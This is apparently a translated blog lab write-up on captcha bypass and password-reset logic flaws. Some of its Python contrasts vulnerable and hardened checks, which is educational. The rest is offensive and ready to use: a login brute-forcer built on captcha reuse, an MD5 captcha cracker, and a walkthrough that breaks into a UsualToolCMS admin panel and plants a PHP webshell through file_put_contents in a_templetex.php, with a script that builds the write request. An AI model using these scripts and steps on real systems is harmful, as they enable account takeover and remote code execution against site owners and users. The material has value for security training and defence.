Verification code bypass, password retrieval vulnerability

Ask how lazy a girl can be: she will not finish the homework for the first seven chapters in one go, usually procrastinates as long as she can, and only rushes to catch up on the target range when she needs it for SRC.

Verification code function:

CAPTCHA is the abbreviation of "Completely Automated Public Turing test to tell Computers and Humans Apart": a public, fully automated program that distinguishes whether the user is a computer or a human.

It can prevent malicious password cracking, vote rigging and forum flooding, and effectively stops an attacker from using a program to make continuous brute-force login attempts against a specific registered user. Using verification codes is now common practice for many websites; we use a relatively simple way to implement this function.

Common postures for verification code bypass:

1. The verification code is only checked on the front end, with no back-end verification. Capture the packet and replay it directly; the verification code is then no obstacle at all.

2. A verification code is displayed but never enforced: you can log in successfully with any random value (presumably the boss did not pay the developers).

3. The verification code can be reused. For example, the current code is 1111. Although the displayed code changes after a failed login, entering 1111 again is still judged correct because the old value was never invalidated on the server (common). http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2016-0169672

4. Null-value bypass. Suppose we capture a login request with user=admin&password=admin&yzm=4123, where yzm carries the verification code. If we remove the yzm parameter entirely and send user=admin&password=admin, the server skips the verification code check and the mechanism is bypassed. http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0155066

5. The image is barely distorted, so a script can recognise it easily. http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2016-0194576

6. The verification code is output in the HTML page itself. http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0146767

7. The verification code is controllable. For example, the code is carried as a URL parameter; since we control the URL, we control the verification code. http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-071289

8. The verification code follows a rule, such as the last 6 digits of the timestamp, or rand() output that can be predicted.

9. There is a universal verification code: whatever the real code is, entering 000000 bypasses it directly.

10. Sometimes the verification code is hidden in a cookie. Check whether the cookie contains a verification-code value or a parameter named after it.

11. There are too few distinct verification-code images, so they are easy to recognise. http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0102178

Verification code required only after several failed logins (so the failure counter can be reset or sidestepped):

Based on session: http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0114450

Based on IP: http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-080327

Based on user: brute-force the username instead of the password
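To make the server-side logic behind items 3, 4 and 9 concrete, here is an added Python model of a login captcha check (example code written for this page; it is not taken from any of the reports above or from any real product). The parameter name yzm is borrowed from item 4, the session is a plain dict standing in for PHP's $_SESSION, and the universal value 000000 is the one from item 9.

```python
import hmac
import secrets
import string

UNIVERSAL_CODE = "000000"   # the "universal" value from item 9 (illustrative only)


def issue_captcha(session, length=4):
    """Server side: generate a numeric captcha and remember it in the session.
    Rendering it as an image is out of scope; the value is returned so the
    example can play the user who reads the image."""
    session["captcha"] = "".join(secrets.choice(string.digits) for _ in range(length))
    return session["captcha"]


def vulnerable_check(session, params):
    """Reproduces three of the bugs listed above in one function."""
    yzm = params.get("yzm")
    if yzm is None:                          # item 4: parameter absent -> check skipped
        return True
    if yzm == UNIVERSAL_CODE:                # item 9: universal value
        return True
    return yzm == session.get("captcha")     # item 3: compared but never invalidated


def hardened_check(session, params):
    """Mandatory, single-use, constant-time comparison, no magic values."""
    expected = session.pop("captcha", None)  # consumed on every attempt, right or wrong
    supplied = params.get("yzm")
    if expected is None or not isinstance(supplied, str):
        return False
    return hmac.compare_digest(expected.encode(), supplied.encode())


def probe(check):
    """Run the three bypass tests from the list against a check function.
    A True result means the bypass worked (or, for first_use, that a genuine
    code was accepted); False means it was blocked."""
    results = {}

    session = {}
    issue_captcha(session)
    results["null_value"] = check(session, {"user": "admin", "password": "admin"})

    session = {}
    issue_captcha(session)
    results["universal"] = check(session, {"user": "admin", "password": "admin",
                                            "yzm": UNIVERSAL_CODE})

    session = {}
    code = issue_captcha(session)
    results["first_use"] = check(session, {"user": "admin", "password": "guess1", "yzm": code})
    # Same code, same session, second attempt: a reusable captcha lets a brute
    # force run without ever solving another image.
    results["reuse"] = check(session, {"user": "admin", "password": "guess2", "yzm": code})
    return results


if __name__ == "__main__":
    print("vulnerable:", probe(vulnerable_check))
    print("hardened:  ", probe(hardened_check))
```

Against a live target the same three probes are done in Burp Repeater: resend the captured login with yzm deleted, with the previous value, and with 000000. If the response is "account and password do not match" rather than a captcha error, the server has the corresponding flaw.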

Password Recovery Vulnerability

1. After the verification code is sent, it is also returned to the front end in the response (http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0114577)

2. The verification code can be brute-forced without limit (http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0155994)

3. The verification code is controllable (http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-086716)

4. The password modification page can be opened directly (http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2013-040908)

5. Unauthorized access (越权) --> verify with your own verification code, then modify the request to change someone else's password

http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0102205 http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2013-016896

There are two types of verification codes:

  1. A public automated program that distinguishes whether the user is a computer or a human (for example, the image code filled in when logging in)
  2. Identity verification, such as SMS verification codes, phone-call verification codes and email verification codes.

What are the verification codes?

There are Chinese characters, pure digits, click-the-character, arithmetic problems, sliding blocks and so on.

What does the verification code do

It prevents malicious password cracking, vote rigging and forum flooding, and stops an attacker from using a program to make continuous brute-force login attempts against a specific registered user (see the function section above).

Is the verification code reliable?

Not necessarily. If there is a logic flaw in the verification code implementation, it is easy to bypass. Even without a logic flaw, if the image distortion is simple, you can write a script to recognise it automatically (Python has libraries for this).

Common Security Problems with Captchas

1. The verification code is checked on the front end only, with no back-end verification

2. The verification code is set but not enforced

3. The verification code can be reused

4. Null-value bypass

5. The verification code can be controlled

6. The verification code follows a rule

7. There is a universal verification code

8. The verification code is placed in a cookie parameter

How to bypass a front-end-only verification code

Capture the packet and replay it directly, because there is no verification on the back end.

What are the general rules for verification codes?

There are many kinds; it depends on how the code is written. The rand function is often used to generate the code, and a predictable seed or a timestamp-based value makes it guessable.

What is the Universal Verification Code?

Usually 000000 or 888888

What is the verification code null-value bypass?

Remove the verification code parameter from the request. If the server only enters the verification branch when the parameter is present, omitting it skips verification entirely.

What does "the verification code is controllable" mean?

The verification code may be passed as a URL parameter. Because the URL is under the attacker's control, so is the verification code.

How to find the verification code in the cookie parameter

Check if there is a corresponding value in the cookie parameter (verification code or corresponding parameter name)

Does the verification code expire?

Generally yes; a common validity period is 30 minutes.

What are the ways to retrieve a password?

1. Send a reset link or a numeric/string verification code by email

2. Send a verification code by SMS

What are the general security issues with password retrieval?

1. The verification code is sent and also returned to the front end

2. There is no limit on the number of times a verification code can be tried

3. The verification code is controllable

4. Visiting the password modification page directly shows the password can be changed there (lack of identity authentication)

5. Unauthorized access (越权): the verification code sent to your own phone is used to change someone else's password

6. There are flaws in the password-protection questions

How to use the front-end return

Look at the returned response (in the browser's developer tools or in a packet capture tool).

What are the dangers of a controllable verification code?

Spam, phishing links and links to malicious websites can be sent through the site's SMS channel.

What is the "directly open the password modification page" situation?

Generally, the password modification page is still reachable after verification fails, so you can go to it directly.

What is missing authentication?

The user ID is not verified against the authenticated identity, so you can bind your own mobile number to someone else's account.

What is unauthorized access (越权)?

Obtain your own verification code, then tamper with the request to change someone else's password.

The difference between unauthorized access and missing authentication

Horizontal unauthorized access must be exploited after logging in; missing authentication needs no login at all.
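The two password-reset flaws that come up in both lists above, unlimited guessing of the code (item 2) and resetting someone else's account with your own code (item 5, 越权), are easiest to see side by side in code. The following is an added Python model written for this page, not code from any reported site: the accounts and phone numbers are constructed, the SMS is replaced by the return value of send_code, and the limits in the hardened version (5 attempts, 300 s validity) are illustrative choices.

```python
import hmac
import secrets
import time

# Constructed sample accounts; phone numbers are placeholders.
ACCOUNTS = {
    "alice": {"phone": "13800000001", "password": "alice-old"},
    "bob":   {"phone": "13800000002", "password": "bob-old"},
}


def new_code():
    return f"{secrets.randbelow(10 ** 6):06d}"


class VulnerableReset:
    """Password reset with two of the flaws listed above: no limit on code
    attempts, and the account to reset is taken from the request instead of
    from the phone number that received the code."""

    def __init__(self):
        self.accounts = {u: dict(a) for u, a in ACCOUNTS.items()}
        self.pending = {}            # phone -> code

    def send_code(self, phone):
        code = new_code()
        self.pending[phone] = code
        return code                  # returned only so the example can stand in for the SMS

    def reset(self, phone, code, username, new_password):
        if self.pending.get(phone) != code:                  # no attempt counter, no expiry
            return False
        self.accounts[username]["password"] = new_password   # username never tied to phone
        return True


class HardenedReset:
    MAX_ATTEMPTS = 5
    TTL_SECONDS = 300

    def __init__(self, now=time.time):
        self.accounts = {u: dict(a) for u, a in ACCOUNTS.items()}
        self.pending = {}            # phone -> [code, expires_at, attempts]
        self.now = now

    def send_code(self, phone):
        code = new_code()
        self.pending[phone] = [code, self.now() + self.TTL_SECONDS, 0]
        return code

    def reset(self, phone, code, username, new_password):
        entry = self.pending.get(phone)
        if entry is None or self.now() > entry[1]:
            self.pending.pop(phone, None)                   # expired or never issued
            return False
        entry[2] += 1
        if entry[2] > self.MAX_ATTEMPTS:
            self.pending.pop(phone, None)                   # lock the code after too many guesses
            return False
        if not hmac.compare_digest(entry[0], code):
            return False
        self.pending.pop(phone, None)                       # single use
        account = self.accounts.get(username)
        if account is None or account["phone"] != phone:    # bind the target to the verified phone
            return False
        account["password"] = new_password
        return True


def brute_force_code(service, phone, username, new_password):
    """Attacker: walk the whole 6-digit space against one issued code.
    Returns the number of requests needed, or None if the service locked
    the code first."""
    for guess in range(10 ** 6):
        if service.reset(phone, f"{guess:06d}", username, new_password):
            return guess + 1
    return None


if __name__ == "__main__":
    v = VulnerableReset()
    v.send_code("13800000002")                       # attacker owns bob's phone
    print("guesses needed:", brute_force_code(v, "13800000002", "bob", "pwned"))
    code = v.send_code("13800000002")
    print("alice reset with bob's code:", v.reset("13800000002", code, "alice", "pwned"))
```

The hardened version also needs a limit on how often send_code itself can be called for one number; otherwise an attacker gets five fresh guesses per SMS, which is still far better than nothing but not a complete fix.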

What are the pitfalls of password-protection questions?

  1. The answer is easy to guess
  2. The answer appears in the JS

How to guess the answer to someone's password-protection question

Analyse the available clues, then use whatever resources you can find and social-engineer the rest.

Is the verification code in the cookie encrypted?

It may be, but often it is only hashed (for example with MD5) rather than encrypted. A short numeric code behind an unsalted hash can be recovered by enumerating the whole code space.
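The practical check for a hashed code in a cookie (covering this answer and the earlier "verification code in the cookie" and "output in the HTML page" items) is to spot the hash and recover the plaintext offline. Added Python example for this page, not code from any site; the cookie header, the assumption that the site stores md5(code), and the code lengths are constructed for illustration.

```python
import hashlib
import itertools
import re
import string

# Anything that looks like a bare 32-hex-digit value in a cookie header.
MD5_RE = re.compile(r"\b[0-9a-fA-F]{32}\b")


def md5_candidates(cookie_header):
    """Pick out values in a Cookie header that have the shape of an MD5 digest."""
    return MD5_RE.findall(cookie_header)


def hash_captcha(code):
    """Assumed server behaviour: unsalted md5 of the plain code (constructed assumption)."""
    return hashlib.md5(code.encode()).hexdigest()


def crack_hashed_captcha(digest, length, alphabet=string.digits):
    """Recover a short captcha from its MD5 by enumerating every string of the
    given length over the alphabet. 10**4 four-digit codes is instantaneous;
    36**6 alphanumerics is still only a few seconds of CPU."""
    digest = digest.lower()
    for chars in itertools.product(alphabet, repeat=length):
        candidate = "".join(chars)
        if hashlib.md5(candidate.encode()).hexdigest() == digest:
            return candidate
    return None


def recover_from_cookie(cookie_header, length, alphabet=string.digits):
    """Try every MD5-shaped cookie value; return (value, code) for the first
    one that cracks, or None."""
    for value in md5_candidates(cookie_header):
        code = crack_hashed_captcha(value, length, alphabet)
        if code is not None:
            return value, code
    return None


if __name__ == "__main__":
    # Constructed cookie: a session id plus a yzm value that is md5("4123").
    cookie = "PHPSESSID=p1q2r3s4t5; yzm=" + hash_captcha("4123")
    print(recover_from_cookie(cookie, 4))
```

If the site also echoes the plain code in the HTML (item 6 of the first list), no cracking is needed at all; this example is for the case where only the hash is visible.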

What are the general generation rules for password-reset verification codes?

They may be derived from the username, password, login time and so on. Request a reset for your own account first and examine one code to learn the rule; once the rule is known you can try to predict or brute-force the code for other accounts.

Let's enter the target range to see the specific operation!!!

The target obviously runs UsualToolCMS.

Go to the vendor's website to find the UsualToolCMS source code.

Download it and look through it.

Find its back-end login address: cmsadmin/a_login.php

Then go to the target range and open the back end.

Try common weak passwords; the response says the account or password does not exist.

Use Burp to capture and analyse the request.

As long as the verification code does not change, the request can be resent with a different password, and the returned page says the account and password do not match.

So it can be brute-forced.

The admin account's password is brute-forced as root.

Successfully logged into its back end.
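The brute force above can be done in Burp Intruder, but a short script makes the captcha-reuse condition explicit and stops as soon as the server starts rejecting the code. Added Python example for this page (not UsualToolCMS code): the host, cookie header and form field names (user, password, yzm) are placeholders and must be taken from the request captured in Burp; the failure marker is a fragment of the "account and password do not match" page described above.

```python
import urllib.parse
import urllib.request

# Assumed values: the path comes from the source tree; host, cookie and field
# names are placeholders for what the Burp capture shows.
LOGIN_URL = "http://target.example/cmsadmin/a_login.php"
FAIL_MARKER = "do not match"   # fragment of the "account and password do not match" page


def make_http_sender(url, cookie_header):
    """Replay a form POST in the captured session and return the response body."""
    def send(form):
        data = urllib.parse.urlencode(form).encode()
        req = urllib.request.Request(url, data=data, method="POST", headers={
            "Cookie": cookie_header,
            "Content-Type": "application/x-www-form-urlencoded",
        })
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode("utf-8", "replace")
    return send


def brute_force(send, user, captcha, wordlist,
                fail_marker=FAIL_MARKER, captcha_marker=None):
    """Resend the captured login with the same captcha value, varying only the
    password. Returns (password, attempts) on success and (None, attempts)
    when the list is exhausted. If captcha_marker is given (the distinctive
    text of a wrong-captcha response, found by sending one deliberately wrong
    code first), the run aborts as soon as it appears: the code is not
    reusable after all and every further request would be wasted."""
    attempts = 0
    for attempts, password in enumerate(wordlist, start=1):
        body = send({"user": user, "password": password, "yzm": captcha})
        if captcha_marker is not None and captcha_marker in body:
            raise RuntimeError(f"captcha rejected after {attempts} attempts; not reusable")
        if fail_marker not in body:
            return password, attempts
    return None, attempts


if __name__ == "__main__":
    # Real use:
    #   send = make_http_sender(LOGIN_URL, "PHPSESSID=<captured>")
    #   brute_force(send, "admin", "<code read from the image in that session>", wordlist)
    # Offline demonstration with a constructed fake server:
    def fake(form):
        return "welcome" if form["password"] == "root" else "account and password do not match"
    print(brute_force(fake, "admin", "4123", ["123456", "admin", "root"]))
```

Success is detected by the absence of the failure text rather than by a success string, so a lockout page or a 5xx also shows up as a "hit"; check the first hit manually before trusting it.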

After entering the back end, I found nothing usable.

Then I audited the source code found earlier.

Found the file_put_contents() function in a_templetex.php.

And it takes POST parameters.

(1) Here file_put_contents() writes a file

(2) In the call, $filenames is the file name and $contents is the file content

(3) As seen above, both are passed via POST

(4) So, as long as the sqlcheck condition on the GET parameter x=m is satisfied,

(5) we pass a file name in $filenames and a one-line PHP webshell in $contents, and we have a shell

First check whether a_templetex.php exists.

Burp captures the packet; change it to POST, add ?x=m, put the file name in the filename field below and the PHP one-line webshell in the content field.

The connection is successful.
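Before dropping a webshell it is worth proving the write primitive with a harmless file, so that a failed write is not confused with a blocked shell. Added Python example for this page, not UsualToolCMS code: the host is a placeholder, the POST field names filenames and contents are taken from the variable names seen in the audit and may differ from the real form, x=m is the GET condition noted above, and the directory the file lands in is assumed to be the script's own directory.

```python
import secrets
import urllib.error
import urllib.parse
import urllib.request

# Placeholder host; path from the audit above.
TEMPLATE_EDITOR = "http://target.example/cmsadmin/a_templetex.php"


def build_write_request(base_url, filename, content, cookie_header):
    """Build the POST that reaches file_put_contents($filenames, $contents)
    behind the x=m check. Returns (url, headers, body)."""
    url = base_url + "?" + urllib.parse.urlencode({"x": "m"})
    body = urllib.parse.urlencode({"filenames": filename, "contents": content}).encode()
    headers = {"Cookie": cookie_header,
               "Content-Type": "application/x-www-form-urlencoded"}
    return url, headers, body


def http_send(url, headers, body=None):
    """POST when a body is given, GET otherwise. Returns (status, text);
    HTTP errors such as 404 are returned rather than raised."""
    method = "POST" if body is not None else "GET"
    req = urllib.request.Request(url, data=body, headers=headers, method=method)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, ""


def probe_write(send, base_url, web_dir_url, cookie_header, filename=None):
    """Write a random token to a .txt file through the vulnerable handler,
    then fetch it back over HTTP. Returns (filename, True) if the token comes
    back, (filename, False) otherwise. `send(url, headers, body)` must return
    (status, text); pass http_send for a real target."""
    token = secrets.token_hex(8)
    filename = filename or f"probe_{token}.txt"
    url, headers, body = build_write_request(base_url, filename, token, cookie_header)
    send(url, headers, body)
    status, text = send(web_dir_url.rstrip("/") + "/" + filename,
                        {"Cookie": cookie_header}, None)
    return filename, status == 200 and token in text


if __name__ == "__main__":
    # Real use (logged-in session cookie from Burp):
    #   probe_write(http_send, TEMPLATE_EDITOR, "http://target.example/cmsadmin/", "PHPSESSID=<captured>")
    # Once (name, True) comes back, the same request with a .php name and the
    # webshell as content is what the walkthrough above sends.
    url, headers, body = build_write_request(TEMPLATE_EDITOR, "probe.txt", "hello", "PHPSESSID=x")
    print(url, body)
```

Delete the probe file afterwards (or overwrite it with empty content through the same handler); leftover files in a CMS admin directory are exactly the kind of artifact a defender greps for.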


Source: blog.csdn.net/weixin_46601374/article/details/123240495